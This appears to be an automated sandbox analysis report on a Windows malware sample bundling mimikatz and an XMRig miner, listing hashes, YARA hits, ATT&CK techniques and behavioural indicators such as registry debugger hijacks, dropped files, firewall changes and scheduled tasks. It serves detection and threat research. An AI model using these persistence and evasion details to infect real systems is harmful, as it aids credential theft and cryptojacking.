mimikatz | 2334e09bbdba3a24db9c4e469e211b97cc35873f8e379e81073da11214838194

Analysis

max time kernel
146s
max time network
153s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
18/01/2024, 23:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe
Size

8.1MB
MD5

994a1dda85a2606649ad14a8a5ca2a83
SHA1

c4ffa4a4a6b9d7571be748bf524701f7a0e87d7e
SHA256

2334e09bbdba3a24db9c4e469e211b97cc35873f8e379e81073da11214838194
SHA512

e54ce8d9e7ee2437f2d7b2a21b590d44437deaf31db5ef637deb9e5041ed2d772d37fe29c0cdde60114448f8e4439a68763f6a128f59479a814507bca3c6e9df
SSDEEP

196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Score

10^/10

mimikatz xmrig discovery evasion miner persistence upx

Malware Config

Signatures

Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 2788 created 916	2788	bubpucp.exe	20

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (22071) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Detects executables containing SQL queries to confidential data stores. Observed in infostealers 2 IoCs

resource	yara_rule
behavioral1/memory/996-135-0x000000013FE40000-0x000000013FF2E000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore
behavioral1/memory/996-136-0x000000013FE40000-0x000000013FF2E000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore

UPX dump on OEP (original entry point) 43 IoCs

resource	yara_rule
behavioral1/memory/2080-0-0x0000000000400000-0x0000000000A9B000-memory.dmp	UPX
behavioral1/files/0x000a00000001224c-7.dat	UPX
behavioral1/memory/2700-8-0x0000000000400000-0x0000000000A9B000-memory.dmp	UPX
behavioral1/files/0x000a00000001224c-6.dat	UPX
behavioral1/files/0x000a00000001224c-9.dat	UPX
behavioral1/files/0x000a00000001224c-5.dat	UPX
behavioral1/files/0x000a00000001224c-4.dat	UPX
behavioral1/files/0x0005000000019433-129.dat	UPX
behavioral1/memory/996-135-0x000000013FE40000-0x000000013FF2E000-memory.dmp	UPX
behavioral1/memory/996-136-0x000000013FE40000-0x000000013FF2E000-memory.dmp	UPX
behavioral1/files/0x0005000000019433-132.dat	UPX
behavioral1/files/0x0005000000019433-131.dat	UPX
behavioral1/files/0x0005000000019433-130.dat	UPX
behavioral1/memory/1816-160-0x000000013F800000-0x000000013F85B000-memory.dmp	UPX
behavioral1/files/0x0005000000019610-158.dat	UPX
behavioral1/memory/448-167-0x000000013F300000-0x000000013F420000-memory.dmp	UPX
behavioral1/memory/2788-166-0x0000000002BE0000-0x0000000002D00000-memory.dmp	UPX
behavioral1/files/0x000500000001950c-164.dat	UPX
behavioral1/memory/1816-169-0x000000013F800000-0x000000013F85B000-memory.dmp	UPX
behavioral1/memory/896-179-0x000000013F6F0000-0x000000013F74B000-memory.dmp	UPX
behavioral1/memory/896-181-0x000000013F6F0000-0x000000013F74B000-memory.dmp	UPX
behavioral1/memory/628-186-0x000000013FDC0000-0x000000013FE1B000-memory.dmp	UPX
behavioral1/memory/628-188-0x000000013FDC0000-0x000000013FE1B000-memory.dmp	UPX
behavioral1/memory/1644-193-0x000000013F550000-0x000000013F5AB000-memory.dmp	UPX
behavioral1/memory/1644-195-0x000000013F550000-0x000000013F5AB000-memory.dmp	UPX
behavioral1/memory/448-197-0x000000013F300000-0x000000013F420000-memory.dmp	UPX
behavioral1/memory/2656-202-0x000000013FC60000-0x000000013FCBB000-memory.dmp	UPX
behavioral1/memory/2656-204-0x000000013FC60000-0x000000013FCBB000-memory.dmp	UPX
behavioral1/memory/448-207-0x000000013F300000-0x000000013F420000-memory.dmp	UPX
behavioral1/files/0x00050000000194ad-210.dat	UPX
behavioral1/files/0x00050000000194ad-209.dat	UPX
behavioral1/memory/448-213-0x000000013F300000-0x000000013F420000-memory.dmp	UPX
behavioral1/memory/2788-215-0x0000000001A80000-0x0000000001ADB000-memory.dmp	UPX
behavioral1/memory/448-214-0x000000013F300000-0x000000013F420000-memory.dmp	UPX
behavioral1/memory/448-217-0x000000013F300000-0x000000013F420000-memory.dmp	UPX
behavioral1/memory/448-218-0x000000013F300000-0x000000013F420000-memory.dmp	UPX
behavioral1/memory/448-308-0x000000013F300000-0x000000013F420000-memory.dmp	UPX
behavioral1/memory/448-329-0x000000013F300000-0x000000013F420000-memory.dmp	UPX
behavioral1/files/0x00050000000194ad-334.dat	UPX
behavioral1/memory/448-336-0x000000013F300000-0x000000013F420000-memory.dmp	UPX
behavioral1/memory/448-338-0x000000013F300000-0x000000013F420000-memory.dmp	UPX
behavioral1/memory/448-340-0x000000013F300000-0x000000013F420000-memory.dmp	UPX
behavioral1/memory/448-341-0x000000013F300000-0x000000013F420000-memory.dmp	UPX

XMRig Miner payload 13 IoCs

miner

resource	yara_rule
behavioral1/memory/448-167-0x000000013F300000-0x000000013F420000-memory.dmp	xmrig
behavioral1/memory/448-197-0x000000013F300000-0x000000013F420000-memory.dmp	xmrig
behavioral1/memory/448-207-0x000000013F300000-0x000000013F420000-memory.dmp	xmrig
behavioral1/memory/448-213-0x000000013F300000-0x000000013F420000-memory.dmp	xmrig
behavioral1/memory/448-214-0x000000013F300000-0x000000013F420000-memory.dmp	xmrig
behavioral1/memory/448-217-0x000000013F300000-0x000000013F420000-memory.dmp	xmrig
behavioral1/memory/448-218-0x000000013F300000-0x000000013F420000-memory.dmp	xmrig
behavioral1/memory/448-308-0x000000013F300000-0x000000013F420000-memory.dmp	xmrig
behavioral1/memory/448-329-0x000000013F300000-0x000000013F420000-memory.dmp	xmrig
behavioral1/memory/448-336-0x000000013F300000-0x000000013F420000-memory.dmp	xmrig
behavioral1/memory/448-338-0x000000013F300000-0x000000013F420000-memory.dmp	xmrig
behavioral1/memory/448-340-0x000000013F300000-0x000000013F420000-memory.dmp	xmrig
behavioral1/memory/448-341-0x000000013F300000-0x000000013F420000-memory.dmp	xmrig

mimikatz is an open source tool to dump credentials on Windows 12 IoCs

resource	yara_rule
behavioral1/memory/2080-0-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral1/files/0x000a00000001224c-7.dat	mimikatz
behavioral1/memory/2700-8-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral1/files/0x000a00000001224c-6.dat	mimikatz
behavioral1/files/0x000a00000001224c-9.dat	mimikatz
behavioral1/files/0x000a00000001224c-5.dat	mimikatz
behavioral1/files/0x000a00000001224c-4.dat	mimikatz
behavioral1/memory/996-135-0x000000013FE40000-0x000000013FF2E000-memory.dmp	mimikatz
behavioral1/memory/996-136-0x000000013FE40000-0x000000013FF2E000-memory.dmp	mimikatz
behavioral1/files/0x00050000000194ad-210.dat	mimikatz
behavioral1/files/0x00050000000194ad-209.dat	mimikatz
behavioral1/files/0x00050000000194ad-334.dat	mimikatz

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	bubpucp.exe
File created	C:\Windows\system32\drivers\npf.sys	wpcap.exe
File created	C:\Windows\system32\drivers\etc\hosts	bubpucp.exe

Modifies Windows Firewall 1 TTPs 2 IoCs

evasion

Windows Service

T1543.003

pid	Process
2640	netsh.exe
2856	netsh.exe

Sets file execution options in registry 2 TTPs 40 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bubpucp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe	bubpucp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bubpucp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bubpucp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe	bubpucp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	bubpucp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bubpucp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	bubpucp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bubpucp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe	bubpucp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe	bubpucp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bubpucp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bubpucp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bubpucp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bubpucp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	bubpucp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe	bubpucp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bubpucp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bubpucp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe	bubpucp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	bubpucp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	bubpucp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bubpucp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe	bubpucp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bubpucp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe	bubpucp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bubpucp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bubpucp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bubpucp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bubpucp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe	bubpucp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	bubpucp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe	bubpucp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe	bubpucp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bubpucp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bubpucp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	bubpucp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	bubpucp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe	bubpucp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bubpucp.exe

Executes dropped EXE 16 IoCs

pid	Process
2700	bubpucp.exe
2788	bubpucp.exe
2488	wpcap.exe
1408	znjiklplb.exe
996	vfshost.exe
536	xohudmc.exe
992	rifzsk.exe
1816	lunglbpll.exe
448	bpgzsl.exe
896	lunglbpll.exe
628	lunglbpll.exe
1644	lunglbpll.exe
2656	lunglbpll.exe
320	bubpucp.exe
2980	tnplbywcb.exe
3704	bubpucp.exe

Loads dropped DLL 22 IoCs

pid	Process
2976	cmd.exe
2976	cmd.exe
2396	cmd.exe
2488	wpcap.exe
2488	wpcap.exe
2488	wpcap.exe
2488	wpcap.exe
2488	wpcap.exe
588	cmd.exe
1408	znjiklplb.exe
1408	znjiklplb.exe
1980	cmd.exe
1980	cmd.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
1884	cmd.exe

UPX packed file 33 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0005000000019433-129.dat	upx
behavioral1/memory/996-135-0x000000013FE40000-0x000000013FF2E000-memory.dmp	upx
behavioral1/memory/996-136-0x000000013FE40000-0x000000013FF2E000-memory.dmp	upx
behavioral1/files/0x0005000000019433-132.dat	upx
behavioral1/files/0x0005000000019433-131.dat	upx
behavioral1/files/0x0005000000019433-130.dat	upx
behavioral1/memory/1816-160-0x000000013F800000-0x000000013F85B000-memory.dmp	upx
behavioral1/files/0x0005000000019610-158.dat	upx
behavioral1/memory/448-167-0x000000013F300000-0x000000013F420000-memory.dmp	upx
behavioral1/memory/2788-166-0x0000000002BE0000-0x0000000002D00000-memory.dmp	upx
behavioral1/files/0x000500000001950c-164.dat	upx
behavioral1/memory/1816-169-0x000000013F800000-0x000000013F85B000-memory.dmp	upx
behavioral1/memory/896-179-0x000000013F6F0000-0x000000013F74B000-memory.dmp	upx
behavioral1/memory/896-181-0x000000013F6F0000-0x000000013F74B000-memory.dmp	upx
behavioral1/memory/628-186-0x000000013FDC0000-0x000000013FE1B000-memory.dmp	upx
behavioral1/memory/628-188-0x000000013FDC0000-0x000000013FE1B000-memory.dmp	upx
behavioral1/memory/1644-193-0x000000013F550000-0x000000013F5AB000-memory.dmp	upx
behavioral1/memory/1644-195-0x000000013F550000-0x000000013F5AB000-memory.dmp	upx
behavioral1/memory/448-197-0x000000013F300000-0x000000013F420000-memory.dmp	upx
behavioral1/memory/2656-202-0x000000013FC60000-0x000000013FCBB000-memory.dmp	upx
behavioral1/memory/2656-204-0x000000013FC60000-0x000000013FCBB000-memory.dmp	upx
behavioral1/memory/448-207-0x000000013F300000-0x000000013F420000-memory.dmp	upx
behavioral1/memory/448-213-0x000000013F300000-0x000000013F420000-memory.dmp	upx
behavioral1/memory/2788-215-0x0000000001A80000-0x0000000001ADB000-memory.dmp	upx
behavioral1/memory/448-214-0x000000013F300000-0x000000013F420000-memory.dmp	upx
behavioral1/memory/448-217-0x000000013F300000-0x000000013F420000-memory.dmp	upx
behavioral1/memory/448-218-0x000000013F300000-0x000000013F420000-memory.dmp	upx
behavioral1/memory/448-308-0x000000013F300000-0x000000013F420000-memory.dmp	upx
behavioral1/memory/448-329-0x000000013F300000-0x000000013F420000-memory.dmp	upx
behavioral1/memory/448-336-0x000000013F300000-0x000000013F420000-memory.dmp	upx
behavioral1/memory/448-338-0x000000013F300000-0x000000013F420000-memory.dmp	upx
behavioral1/memory/448-340-0x000000013F300000-0x000000013F420000-memory.dmp	upx
behavioral1/memory/448-341-0x000000013F300000-0x000000013F420000-memory.dmp	upx

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
19	ifconfig.me
20	ifconfig.me

Creates a Windows Service
persistence

Drops file in System32 directory 18 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357	bubpucp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BC5F9EEA6885ADA7AD24639E57D2FCB1	bubpucp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BC5F9EEA6885ADA7AD24639E57D2FCB1	bubpucp.exe
File created	C:\Windows\SysWOW64\pthreadVC.dll	wpcap.exe
File created	C:\Windows\SysWOW64\Packet.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A	bubpucp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015	bubpucp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A	bubpucp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	bubpucp.exe
File created	C:\Windows\SysWOW64\wpcap.dll	wpcap.exe
File created	C:\Windows\system32\wpcap.dll	wpcap.exe
File created	C:\Windows\SysWOW64\rifzsk.exe	xohudmc.exe
File created	C:\Windows\system32\Packet.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\rifzsk.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357	bubpucp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	bubpucp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015	bubpucp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	bubpucp.exe

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\WinPcap\rpcapd.exe	wpcap.exe
File created	C:\Program Files\WinPcap\LICENSE	wpcap.exe
File created	C:\Program Files\WinPcap\uninstall.exe	wpcap.exe

Drops file in Windows directory 60 IoCs

description	ioc	Process
File created	C:\Windows\lsyqbeqew\ylzbebeqp\znjiklplb.exe	bubpucp.exe
File created	C:\Windows\lsyqbeqew\ylzbebeqp\wpcap.dll	bubpucp.exe
File created	C:\Windows\lsyqbeqew\UnattendGC\spoolsrv.xml	bubpucp.exe
File created	C:\Windows\ime\bubpucp.exe	bubpucp.exe
File created	C:\Windows\lsyqbeqew\UnattendGC\specials\schoedcl.xml	bubpucp.exe
File opened for modification	C:\Windows\jgebjtcb\vimpcsvc.xml	bubpucp.exe
File created	C:\Windows\lsyqbeqew\UnattendGC\specials\trch-1.dll	bubpucp.exe
File created	C:\Windows\lsyqbeqew\UnattendGC\specials\trfo-2.dll	bubpucp.exe
File created	C:\Windows\lsyqbeqew\Corporate\mimidrv.sys	bubpucp.exe
File created	C:\Windows\lsyqbeqew\ylzbebeqp\ip.txt	bubpucp.exe
File created	C:\Windows\lsyqbeqew\UnattendGC\schoedcl.xml	bubpucp.exe
File created	C:\Windows\lsyqbeqew\UnattendGC\AppCapture64.dll	bubpucp.exe
File created	C:\Windows\lsyqbeqew\UnattendGC\specials\cnli-1.dll	bubpucp.exe
File created	C:\Windows\lsyqbeqew\UnattendGC\specials\schoedcl.exe	bubpucp.exe
File opened for modification	C:\Windows\jgebjtcb\docmicfg.xml	bubpucp.exe
File created	C:\Windows\lsyqbeqew\UnattendGC\specials\spoolsrv.exe	bubpucp.exe
File created	C:\Windows\lsyqbeqew\UnattendGC\docmicfg.xml	bubpucp.exe
File created	C:\Windows\lsyqbeqew\UnattendGC\specials\exma-1.dll	bubpucp.exe
File created	C:\Windows\lsyqbeqew\UnattendGC\specials\svschost.exe	bubpucp.exe
File created	C:\Windows\lsyqbeqew\UnattendGC\AppCapture32.dll	bubpucp.exe
File created	C:\Windows\lsyqbeqew\ylzbebeqp\scan.bat	bubpucp.exe
File created	C:\Windows\jgebjtcb\bubpucp.exe	2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe
File opened for modification	C:\Windows\lsyqbeqew\ylzbebeqp\Packet.dll	bubpucp.exe
File created	C:\Windows\lsyqbeqew\UnattendGC\specials\crli-0.dll	bubpucp.exe
File created	C:\Windows\lsyqbeqew\UnattendGC\specials\tibe-2.dll	bubpucp.exe
File created	C:\Windows\jgebjtcb\spoolsrv.xml	bubpucp.exe
File created	C:\Windows\lsyqbeqew\UnattendGC\specials\libeay32.dll	bubpucp.exe
File created	C:\Windows\lsyqbeqew\UnattendGC\specials\spoolsrv.xml	bubpucp.exe
File created	C:\Windows\lsyqbeqew\UnattendGC\specials\vimpcsvc.xml	bubpucp.exe
File created	C:\Windows\jgebjtcb\vimpcsvc.xml	bubpucp.exe
File opened for modification	C:\Windows\jgebjtcb\spoolsrv.xml	bubpucp.exe
File created	C:\Windows\lsyqbeqew\UnattendGC\Shellcode.ini	bubpucp.exe
File created	C:\Windows\lsyqbeqew\UnattendGC\specials\tucl-1.dll	bubpucp.exe
File created	C:\Windows\lsyqbeqew\UnattendGC\specials\docmicfg.exe	bubpucp.exe
File created	C:\Windows\lsyqbeqew\UnattendGC\vimpcsvc.xml	bubpucp.exe
File opened for modification	C:\Windows\lsyqbeqew\ylzbebeqp\Result.txt	tnplbywcb.exe
File created	C:\Windows\lsyqbeqew\ylzbebeqp\Packet.dll	bubpucp.exe
File created	C:\Windows\lsyqbeqew\Corporate\vfshost.exe	bubpucp.exe
File created	C:\Windows\lsyqbeqew\Corporate\mimilib.dll	bubpucp.exe
File created	C:\Windows\lsyqbeqew\UnattendGC\specials\posh-0.dll	bubpucp.exe
File created	C:\Windows\lsyqbeqew\UnattendGC\specials\vimpcsvc.exe	bubpucp.exe
File created	C:\Windows\lsyqbeqew\UnattendGC\svschost.xml	bubpucp.exe
File created	C:\Windows\lsyqbeqew\UnattendGC\specials\docmicfg.xml	bubpucp.exe
File opened for modification	C:\Windows\jgebjtcb\schoedcl.xml	bubpucp.exe
File opened for modification	C:\Windows\jgebjtcb\bubpucp.exe	2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe
File created	C:\Windows\lsyqbeqew\ylzbebeqp\tnplbywcb.exe	bubpucp.exe
File created	C:\Windows\lsyqbeqew\UnattendGC\specials\ssleay32.dll	bubpucp.exe
File created	C:\Windows\lsyqbeqew\UnattendGC\specials\zlib1.dll	bubpucp.exe
File created	C:\Windows\jgebjtcb\svschost.xml	bubpucp.exe
File created	C:\Windows\lsyqbeqew\ylzbebeqp\wpcap.exe	bubpucp.exe
File created	C:\Windows\lsyqbeqew\UnattendGC\specials\xdvl-0.dll	bubpucp.exe
File created	C:\Windows\jgebjtcb\schoedcl.xml	bubpucp.exe
File opened for modification	C:\Windows\jgebjtcb\svschost.xml	bubpucp.exe
File created	C:\Windows\lsyqbeqew\upbdrjv\swrpwe.exe	bubpucp.exe
File created	C:\Windows\lsyqbeqew\UnattendGC\specials\coli-0.dll	bubpucp.exe
File created	C:\Windows\lsyqbeqew\UnattendGC\specials\libxml2.dll	bubpucp.exe
File created	C:\Windows\lsyqbeqew\UnattendGC\specials\ucl.dll	bubpucp.exe
File created	C:\Windows\lsyqbeqew\UnattendGC\specials\svschost.xml	bubpucp.exe
File created	C:\Windows\jgebjtcb\docmicfg.xml	bubpucp.exe
File opened for modification	C:\Windows\lsyqbeqew\Corporate\log.txt	cmd.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1004	sc.exe
592	sc.exe
1992	sc.exe
1244	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

NSIS installer 14 IoCs

installer

resource	yara_rule
behavioral1/files/0x000a00000001224c-7.dat	nsis_installer_2
behavioral1/files/0x000a00000001224c-6.dat	nsis_installer_2
behavioral1/files/0x000a00000001224c-9.dat	nsis_installer_2
behavioral1/files/0x000a00000001224c-5.dat	nsis_installer_2
behavioral1/files/0x000a00000001224c-4.dat	nsis_installer_2
behavioral1/files/0x0007000000015d70-15.dat	nsis_installer_1
behavioral1/files/0x0007000000015d70-15.dat	nsis_installer_2
behavioral1/files/0x0007000000015d70-16.dat	nsis_installer_1
behavioral1/files/0x0007000000015d70-16.dat	nsis_installer_2
behavioral1/files/0x0007000000015d70-14.dat	nsis_installer_1
behavioral1/files/0x0007000000015d70-14.dat	nsis_installer_2
behavioral1/files/0x00050000000194ad-210.dat	nsis_installer_2
behavioral1/files/0x00050000000194ad-209.dat	nsis_installer_2
behavioral1/files/0x00050000000194ad-334.dat	nsis_installer_2

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1052	schtasks.exe
2136	schtasks.exe
1624	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ee-ad-b1-93-64-4b\WpadDecision = "0"	bubpucp.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	bubpucp.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client"	bubpucp.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	bubpucp.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	bubpucp.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	bubpucp.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	bubpucp.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	bubpucp.exe
